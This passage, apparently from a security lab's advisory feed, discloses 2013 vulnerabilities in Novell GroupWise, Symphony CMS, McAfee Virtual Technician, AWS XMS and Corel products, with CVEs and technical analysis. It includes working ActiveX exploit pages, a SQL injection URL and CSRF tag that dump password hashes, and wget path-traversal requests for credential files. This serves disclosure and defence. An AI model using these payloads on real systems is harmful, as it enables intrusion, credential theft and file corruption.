<b>{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}</b>, located by default in "<b>C:\Program Files\Novell\GroupWise\gwabdlg.dll</b>"<br /> <br /> A remote attacker can pass an arbitrary value to the <b>pInvokeParams</b> argument of the <b>InvokeContact()</b> method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. <br /> <br /> Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.<br /> <br /> <b>5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]</b><br /> <br /> Later this value will be allocated into the stack:<br /> <br /> <b>5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX</b><br /> <br /> The code continues its flow and enters a switch case algorithm:<br /> <br /> <font color=#606060>5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1<br /> 5722D311 0F84 57010000 JE gwabdlg.5722D46E<br /> 5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2<br /> 5722D31E 0F84 00010000 JE gwabdlg.5722D424</font><br /> <b>5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3</b><br /> <font color=#606060>5722D32B 0F84 83010000 JE gwabdlg.5722D4B4<br /> 5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4<br /> 5722D338 0F84 AF020000 JE gwabdlg.5722D5ED<br /> 5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5<br /> 5722D345 0F84 9A030000 JE gwabdlg.5722D6E5<br /> 5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6</font><br /> <br /> If an attacker can specify a custom switch value, in this case the number 3, it will jump to the address <b>0x5722D4B4</b><br /> <font color=#606060>5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]<br /> 5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX<br /> 5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0<br /> 5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]<br /> 5722D4C1 50 PUSH EAX<br /> 5722D4C2 68 58122D57 PUSH gwabdlg.572D1258<br /> 5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]<br /> 5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]<br /> 5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]<br /> 5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30]</font><br /> <b>5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX]</b><br /> <font color=#606060>5722D4D5 51 PUSH ECX</font><br /> <b>5722D4D6 FF10 CALL DWORD PTR DS:[EAX]</b><br /> <br /> After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the <b>CALL DWORD PTR DS:[EAX]</b> instruction:<br /> <br /> <font color=#606060>0C0C0C0C 0C 0C OR AL,0C<br /> 0C0C0C0E 0C 0C OR AL,0C<br /> 0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX]<br /> 0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL<br /> 0C0C0C14 0C 0C OR AL,0C<br /> 0C0C0C16 0C 0C OR AL,0C<br /> 0C0C0C18 0C 0C OR AL,0C<br /> 0C0C0C1A 0C 0C OR AL,0C</font><br /> <br /> <br /> <b>Crash details:</b><br /> <font color=#606060>(162c.5ae0): Access violation - code c0000005 (first chance)<br /> First chance exceptions are reported before any exception handling.<br /> This exception may be expected and handled.<br /> eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4<br /> eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202<br /> *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - <br /> gwabdlg!DllUnregisterServer+0x4c10e:<br /> 5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????</font><br /> <br /> <br /> <b>The following PoC will crash Internet Explorer 7/8/9:</b><br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">!--</font> (c)oded by High-Tech Bridge Security Research Lab --&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">title</font>&gt;</font> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">title</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font> <font color="#800080">language</font>=<font color="#FF00FF">'vbscript'</font>&gt;</font><br /> Sub PoC()<br /> arg1=202116104<br /> target.InvokeContact arg1 <br /> End Sub<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h3</font>&gt;</font> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">h3</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h4</font>&gt;</font> Untrusted Pointer Dereference PoC <font color="#0000FF">&lt;/<font color="#808000">h4</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">hr</font>&gt;</font><br /> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> language=VBScript onclick=PoC() type=button <font color="#800080">value</font>=<font color="#FF00FF">&quot;Proof of Concept&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">object</font> <font color="#800080">classid</font>=<font color="#FF00FF">'clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'</font><br /> <font color="#800080">id</font>=<font color="#FF00FF">'Target'</font>&gt;</font><font color="#0000FF">&lt;/<font color="#808000">object</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> <b>Code execution PoC:</b><br /> The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.<br /> <a href="https://www.htbridge.com/advisory/HTB23131_POC_1.zip">https://www.htbridge.com/advisory/HTB23131_POC_1.zip</a><br /> Archive's Password: HTB23131_novell(gw)<br /> <br /> <br /> 1.2 The vulnerability exists due to an untrusted pointer dereference error in the <b>GenerateSummaryPage()</b> method within the ActiveX control (<b>gwabdlg.dll</b>, GUID <b>{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}</b>, located by default in "<b>C:\Program Files\Novell\GroupWise\gwabdlg.dll</b>".<br /> <br /> A remote attacker can pass an arbitrary value to the <b>pInvokeParams</b> argument of the <b>GenerateSummaryPage()</b> method and trigger the ACCESS_VIOLATION exception on a MOV EAX, DWORD PTR [EAX+4] instruction. <br /> <br /> Since it is conceivable to supply a custom pointer, an attacker can exploit this vulnerability relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer plus four bytes into the EAX register.<br /> <br /> <b>5722D301 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]</b><br /> <br /> Later this value will be allocated into the stack:<br /> <br /> <b>5722D304 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX</b><br /> <br /> The code continues its flow and enters a switch case algorithm:<br /> <font color=#606060>5722D30A 83BD 24FFFFFF 01 CMP DWORD PTR SS:[EBP-DC],1<br /> 5722D311 0F84 57010000 JE gwabdlg.5722D46E<br /> 5722D317 83BD 24FFFFFF 02 CMP DWORD PTR SS:[EBP-DC],2<br /> 5722D31E 0F84 00010000 JE gwabdlg.5722D424</font><br /> <b>5722D324 83BD 24FFFFFF 03 CMP DWORD PTR SS:[EBP-DC],3</b><br /> <font color=#606060>5722D32B 0F84 83010000 JE gwabdlg.5722D4B4<br /> 5722D331 83BD 24FFFFFF 04 CMP DWORD PTR SS:[EBP-DC],4<br /> 5722D338 0F84 AF020000 JE gwabdlg.5722D5ED<br /> 5722D33E 83BD 24FFFFFF 05 CMP DWORD PTR SS:[EBP-DC],5<br /> 5722D345 0F84 9A030000 JE gwabdlg.5722D6E5<br /> 5722D34B 83BD 24FFFFFF 06 CMP DWORD PTR SS:[EBP-DC],6</font><br /> <br /> If an attacker can specify a custom switch value, in this case the number 3, it will jump to address <b>0x5722D4B4</b><br /> <font color=#606060>5722D4B4 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]<br /> 5722D4B7 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX<br /> 5722D4BA 8365 D8 00 AND DWORD PTR SS:[EBP-28],0<br /> 5722D4BE 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]<br /> 5722D4C1 50 PUSH EAX<br /> 5722D4C2 68 58122D57 PUSH gwabdlg.572D1258<br /> 5722D4C7 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]<br /> 5722D4CA 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]<br /> 5722D4CD 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]<br /> 5722D4D0 8B49 30 MOV ECX,DWORD PTR DS:[ECX+30]</font><br /> <b>5722D4D3 8B00 MOV EAX,DWORD PTR DS:[EAX]</b><br /> <font color=#606060>5722D4D5 51 PUSH ECX</font><br /> <b>5722D4D6 FF10 CALL DWORD PTR DS:[EAX]</b><br /> <br /> After entering into this function, and since the EAX register is completely under the attacker control, it is possible to supply another custom pointer that will be executed after the code reaches the <b>CALL DWORD PTR DS:[EAX]</b> instruction.<br /> <font color=#606060>0C0C0C0C 0C 0C OR AL,0C<br /> 0C0C0C0E 0C 0C OR AL,0C<br /> 0C0C0C10 0300 ADD EAX,DWORD PTR DS:[EAX]<br /> 0C0C0C12 0000 ADD BYTE PTR DS:[EAX],AL<br /> 0C0C0C14 0C 0C OR AL,0C<br /> 0C0C0C16 0C 0C OR AL,0C<br /> 0C0C0C18 0C 0C OR AL,0C<br /> 0C0C0C1A 0C 0C OR AL,0C</font><br /> <br /> <br /> <b>Crash details:</b><br /> <font color=#606060>(162c.5ae0): Access violation - code c0000005 (first chance)<br /> First chance exceptions are reported before any exception handling.<br /> This exception may be expected and handled.<br /> eax=0c0c0c08 ebx=572caacc ecx=57307f00 edx=0029677a esi=00296754 edi=001deda4<br /> eip=5722d301 esp=001dec3c ebp=001ded24 iopl=0 nv up ei pl nz na po nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202<br /> *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Novell\GroupWise\gwabdlg.dll - <br /> gwabdlg!DllUnregisterServer+0x4c10e:<br /> 5722d301 8b4004 mov eax,dword ptr [eax+4] ds:0023:0c0c0c0c=????????</font><br /> <br /> <br /> <b>The following PoC will crash Internet Explorer 7/8/9:</b><br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">!--</font> (c)oded by High-Tech Bridge Security Research Lab --&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">title</font>&gt;</font>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">title</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font> <font color="#800080">language</font>=<font color="#FF00FF">'vbscript'</font>&gt;</font><br /> Sub PoC()<br /> arg1=202116108<br /> <font color="#800080">arg2</font>=<font color="#FF00FF">&quot;defaultV&quot;</font><br /> <font color="#800080">arg3</font>=<font color="#FF00FF">&quot;defaultV&quot;</font><br /> target.GenerateSummaryPage arg1 ,arg2 ,arg3<br /> End Sub<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h3</font>&gt;</font> Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">h3</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h4</font>&gt;</font>Untrusted Pointer Dereference PoC<font color="#0000FF">&lt;/<font color="#808000">h4</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">hr</font>&gt;</font><br /> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address <br /> 0x0c0c0c0c.<font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> language=VBScript onclick=PoC() type=button <font color="#800080">value</font>=<font color="#FF00FF">&quot;Proof of Concept&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">object</font> <font color="#800080">classid</font>=<font color="#FF00FF">'clsid:54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF'</font><br /> <font color="#800080">id</font>=<font color="#FF00FF">'Target'</font>&gt;</font><font color="#0000FF">&lt;/<font color="#808000">object</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> <b>Code execution PoC:</b><br /> The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.<br /> <a href="https://www.htbridge.com/advisory/HTB23131_POC_2.zip">https://www.htbridge.com/advisory/HTB23131_POC_2.zip</a><br /> Archive's Password: HTB23131_novell(gw)<br /> <br /> <br /> 1.3 The vulnerability exists due to an untrusted pointer dereference error in the <b>SecManageRecipientCertificates()</b> method within the ActiveX control (<b>gwmim1.ocx</b>, GUID <b>{BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}</b>, located by default in "<b>C:\Program Files\Novell\GroupWise\gwmim1.ocx</b>".<br /> <br /> A remote attacker can pass an arbitrary value to the <b>lProp</b> argument of the <b>SecManageRecipientCertificates()</b> method and trigger the ACCESS_VIOLATION exception on a MOV EDX,DWORD PTR DS:[ECX] instruction. <br /> Since it is possible to supply a specially crafted pointer, an attacker can abuse this flaw relying on the heap-spray technique. After the crash, the application moves the value of the supplied pointer into the EDX register.<br /> <b>10014805 MOV EDX,DWORD PTR DS:[ECX]</b><br /> <br /> Later the same operation is performed, however this time it is the EAX register that inherits the untrusted pointer value.<br /> <b>10014807 MOV EAX,DWORD PTR DS:[EDX]</b><br /> <br /> Eventually code execution is reached at the address <b>0x10014809</b><br /> <b>10014809 CALL EAX</b><br /> <br /> <br /> <b>Crash details:</b><br /> <font color=#606060>(5c78.58f0): Access violation - code c0000005 (first chance)<br /> First chance exceptions are reported before any exception handling.<br /> This exception may be expected and handled.<br /> eax=0275c46c ebx=00000000 ecx=0c0c0c0c edx=0000001b esi=0956de40 edi=00000000<br /> eip=10014805 esp=0275c45c ebp=0275c55c iopl=0 nv up ei pl nz na pe nc<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206<br /> *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwmim1.ocx - <br /> gwmim1!DllUnregisterServer+0x8cb5:<br /> 10014805 8b11 mov edx,dword ptr [ecx] ds:0023:0c0c0c0c=????????</font><br /> <br /> <br /> <b>The following PoC will crash Internet Explorer 7/8/9:</b><br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">!--</font> (c)oded by High-Tech Bridge Security Research Lab --&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">title</font>&gt;</font>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">title</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">head</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">script</font> <font color="#800080">language</font>=<font color="#FF00FF">'vbscript'</font>&gt;</font><br /> Sub PoC()<br /> arg1=202116108<br /> target.SecManageRecipientCertificates arg1<br /> End Sub<br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h3</font>&gt;</font>Novell GroupWise Multiple Remote Code Execution vulnerabilities v.12.0.0.8586<font color="#0000FF">&lt;/<font color="#808000">h3</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h4</font>&gt;</font> Untrusted Pointer Dereference PoC <font color="#0000FF">&lt;/<font color="#808000">h4</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">hr</font>&gt;</font><br /> This simple PoC will crash Internet Explorer v9.0 when trying to read the arbitrary address 0x0c0c0c0c.<font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><font color="#0000FF">&lt;<font color="#808000">BR</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> language=VBScript onclick=PoC() type=button <font color="#800080">value</font>=<font color="#FF00FF">&quot;Proof of Concept&quot;</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">body</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">object</font> <font color="#800080">classid='clsid:BFEC5A01-1EB1-11D1-BC96-00805FC1C85A'id</font>=<font color="#FF00FF">'Target'</font>&gt;</font><font color="#0000FF">&lt;/<font color="#808000">object</font>&gt;</font> <br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font><br /> <br /> <br /> <b>Code execution PoC:</b><br /> The following PoC code will first spray the heap with the 0x0C byte, as a typical "No Operation" sled for a heap-spray exploitation. Following this the 0xCC byte (Interrupt 3 - trap to debugger) illustrates the beginning of shellcode.<br /> <a href="https://www.htbridge.com/advisory/HTB23131_POC_3.zip">https://www.htbridge.com/advisory/HTB23131_POC_3.zip</a><br /> Archive's Password: HTB23131_novell(gw)<br /> https://www.htbridge.com/advisory/HTB23131Wed, 03 Apr 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23148<b>Product:</b> Symphony v2.3.1<br><b>Vulnerability Type:</b> SQL Injection [CWE-89]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://getsymphony.com/<br><b>Vendor Notification:</b> 2013-03-13 13:13:50<br><b>Public Disclosure:</b> April 3, 2013 <br><b>CVE Reference:</b> CVE-2013-2559<br> <b>CVSSv2 Base Score:</b> 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in Symphony, which can be exploited to alter SQL requests to database of the vulnerable application.<br /> <br /> <br /> 1) SQL Injection in Symphony: CVE-2013-2559<br /> <br /> The vulnerability exists due to insufficient filtration of "sort" HTTP GET parameter passed via "/symphony/system/authors/" URL to "/index.php" script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.<br /> <br /> Depending on database and system configuration, this PoC (Proof of Concept) code will create "/var/www/file.txt" file, containing users account information (logins, hashed passwords, etc.) from the "authors" table:<br /> <br /> <font color=#606060>http://[host]/symphony/system/authors/?order=asc&amp;sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20</font><br /> <br /> <br /> This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick the logged-in administrator to visit a web page with CSRF exploit:<br /> <br /> <font color=#606060>&lt;img src=&quot;http://[host]/symphony/system/authors/?order=asc&amp;sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20&quot;&gt;</font>https://www.htbridge.com/advisory/HTB23148Wed, 03 Apr 2013 00:00:00 +0200https://www.htbridge.com/advisory/HTB23128<b>Product:</b> McAfee Virtual Technician (MVT) 6.5.0.2101 v6.5.0.2101 and probably prior<br><b>Vulnerability Type:</b> Exposed Unsafe ActiveX Method [CWE-618]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> McAfee<br><b>Vendor Notification:</b> 2012-11-19 12:00:00<br><b>Public Disclosure:</b> March 27, 2013 <br><b>CVE Reference:</b> CVE-2012-5879<br> <b>CVSSv2 Base Score:</b> 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system.<br /> <br /> <br /> 1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879<br /> <br /> The vulnerability exists due to the ActiveX control including the insecure "Save()" method in "McHealthCheck.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user.<br /> <br /> The following PoC code is available:<br /> <br /> <font color="#0000FF">&lt;<font color="#808000">html</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h4</font>&gt;</font>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101<font color="#0000FF">&lt;/<font color="#808000">h4</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">h5</font>&gt;</font>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method &quot;Save()&quot;:<font color="#0000FF">&lt;/<font color="#808000">h5</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">object</font> <font color="#800080">classid</font>=<font color="#FF00FF">'clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256'</font> <font color="#800080">id</font>=<font color="#FF00FF">'target'</font>&gt;</font><font color="#0000FF">&lt;/<font color="#808000">object</font>&gt;</font><br /> <font color="#0000FF">&lt;<font color="#808000">input</font> <font color="#800080">type</font>=<font color="#FF00FF">&quot;button&quot;</font> <font color="#800080">value</font>=<font color="#FF00FF">&quot;Boom!&quot;</font> <font color="#800080">language</font>=<font color="#FF00FF">&quot;VBScript&quot;</font> <font color="#800080">OnClick</font>=<font color="#FF00FF">&quot;CreateArbitraryFile()&quot;</font>&gt;</font><br /> <br /> <font color="#0000FF">&lt;<font color="#808000">script</font> <font color="#800080">language</font>=<font color="#FF00FF">&quot;VBScript&quot;</font>&gt;</font><br /> sub CreateArbitraryFile()<br /> <font color="#800080">arg1</font>=<font color="#FF00FF">&quot;FilePath\File_name_to_corrupt_or_create&quot;</font><br /> target.Save arg1 <br /> End Sub<br /> <br /> <font color="#0000FF">&lt;/<font color="#808000">script</font>&gt;</font><br /> <font color="#0000FF">&lt;/<font color="#808000">html</font>&gt;</font>https://www.htbridge.com/advisory/HTB23128Wed, 27 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23147<b>Product:</b> AWS XMS v2.5<br><b>Vulnerability Type:</b> Path Traversal [CWE-22]<br><b>Risk level: </b>Medium <img src="https://www.htbridge.com/images/risk2.png" style='margin-bottom:4px;'><br /><b>Creater:</b> http://www.aws-dms.com<br><b>Vendor Notification:</b> 2013-03-06 13:51:31<br><b>Public Disclosure:</b> March 27, 2013 <br><b>CVE Reference:</b> CVE-2013-2474<br> <b>CVSSv2 Base Score:</b> 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered path traversal vulnerability in AWS XMS, which can be exploited to read contents of arbitrary files.<br /> <br /> <br /> 1) Path Traversal in AWS XMS: CVE-2013-2474<br /> <br /> The vulnerability exists due to insufficient filtration of "what" HTTP GET parameter passed to "/importer.php" script before using it in PHP "file()" function. A remote attacker can read contents of arbitrary files on the target system.<br /> <br /> The vulnerable script sets "text/javascript" Content-Type for the output data, which makes exploitation of the vulnerability via a web browser inconvenient. Exploitation via telnet or wget utilities is easier. <br /> <br /> The following PoC (Proof of Concept) code uses wget utility to download source code of "/default.php" file, which contains application configuration data and administrator’s credentials:<br /> <br /> <font color=#606060>wget http://[host]/importer.php?what=defaults.php%00.js</font><br /> <br /> To bypass protections against NULL-byte injection (implemented in PHP 5.3.4 and later versions) or enabled "magic_quotes_gpc", alternative techniques based on path normalization and length restrictions can be used.<br /> <br /> The second PoC code uses a large amount of '/' symbols (4096 is sufficient for the majority of platforms) to bypass the restrictions and get source code of the "/default.php" file:<br /> <br /> <font color=#606060>wget http://[host]/importer.php?what=defaults.php///////...//////.js</font>https://www.htbridge.com/advisory/HTB23147Wed, 27 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23114<b>Product:</b> Corel WordPerfect X6 Standard Edition v16.0.0.388, other versions may be also affected<br><b>Vulnerability Type:</b> Untrusted Pointer Dereference [CWE-822]<br><b>Risk level: </b>Low <img src="https://www.htbridge.com/images/risk1.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Corel Corporation<br><b>Vendor Notification:</b> 2012-09-12 14:09:06<br><b>Public Disclosure:</b> March 7, 2013 <br><b>CVE Reference:</b> CVE-2012-4900<br> <b>CVSSv2 Base Score:</b> 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered an untrusted pointer dereference vulnerability in Corel WordPerfect. Opening of a malicious WPD (WordPerfect Document) causes immediate application crash, resulting in a loss of all unsaved current application data of the user.<br /> <br /> <br /> 1) Untrusted Pointer Dereference Vulnerability in Corel WordPerfect X6: CVE-2012-4900<br /> <br /> The very beginning of the crash occurs within the <b>WPWIN16.DLL</b> module in the <b>STARTAPP</b> function when the application attempts to call the <b>STRNICMP</b> procedure in the <b>MSVCR80</b> module. Due to a specially crafted WPD file and as a result of the stack modification, it is possible to partially control the destination pointer <b>[EDI]</b> inherited by the <b>STRNICMP</b> function.<br /> <br /> Crash details:<br /> <font color=#606060>eax=0225a848 ebx=0224ce48 ecx=00000008 edx=00000008</font> <b><font color=#606060>esi=0224ce48 edi=0225a848</font></b><br /> <font color=#606060>eip=69fe74bc esp=0012ee80 ebp=0012ee9c iopl=0 nv up ei pl nz na po cy<br /> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010203</font><br /> <br /> <br /> MSVCR80!strnicmp+0x261:<br /> <b><font color=#606060>69fe74bc f3a4 rep movs byte ptr es:[edi],byte ptr [esi]</font></b><br /> <font color=#606060>Exception Faulting Address: 0x225a848<br /> First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)</font><br /> <b><font color=#606060>Exception Sub-Type: Write Access Violation</font></b><br /> <br /> <br /> Stack Trace:<br /> <font color=#606060>MSVCR80!strnicmp+0x261<br /> wpwin16!StartApp+0xbdc8e<br /> wpwin16!StartApp+0xc5ef1<br /> wpwin16!StartApp+0xc67f3<br /> wpwin16!StartApp+0xc0758<br /> ntdll!RtlAllocateHeap+0x211<br /> ntdll!RtlAllocateHeap+0xac<br /> ntdll!RtlTryEnterCriticalSection+0x9ba<br /> ntdll!RtlTryEnterCriticalSection+0x98f<br /> WStr16!WPwmemcpy+0x1e<br /> PFIT160!wread+0xe1<br /> MSVCR80!strnicmp+0x135<br /> wpwin16!StartApp+0xdfe00</font><br /> <br /> <br /> In order to exploit the vulnerability remotely the attacker has to send a malicious file to the victim by email. In a web-based scenario, the attacker can host a malicious file on a website or WebDav share and trick the victim to download and open the file. <br /> <br /> As a PoC (Proof of Concept) a file "PoC.wpd" is <a href="https://www.htbridge.com/advisory/HTB23114-PoC.rar">provided</a>, which causes immediate application crash. Password for archive: k2-0xj)Dhfjhlfs<br /> https://www.htbridge.com/advisory/HTB23114Thu, 07 Mar 2013 00:00:00 +0100https://www.htbridge.com/advisory/HTB23112<b>Product:</b> Corel Quattro Pro X6 Standard Edition v16.0.0.388, other versions may be also affected<br><b>Vulnerability Type:</b> NULL Pointer Dereference [CWE-476]<br><b>Risk level: </b>Low <img src="https://www.htbridge.com/images/risk1.png" style='margin-bottom:4px;'><br /><b>Creater:</b> Corel Corporation<br><b>Vendor Notification:</b> 2012-08-27 12:00:00<br><b>Public Disclosure:</b> March 7, 2013 <br><b>CVE Reference:</b> CVE-2012-4728<br> <b>CVSSv2 Base Score:</b> 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)<br> <b>Vulnerability Details:</b> High-Tech Bridge Security Research Lab discovered two null pointer dereference vulnerabilities in Corel Quattro Pro. Opening of a malicious QPW (Quattro Pro Spreadsheet) document causes immediate application crash, resulting in a loss of all unsaved current application data of the user.<br /> <br /> <br /> 1) Multiple Null Pointer Dereference vulnerabilities in Corel Quattro Pro X6: CVE-2012-4728<br /> <br /> 1.1 The first crash occurs in the <b>QPW160.dll</b> module at the <b>QProGetNotebookWindowHandle</b> function when the application tries to move a value to a corrupted pointer. Due to the 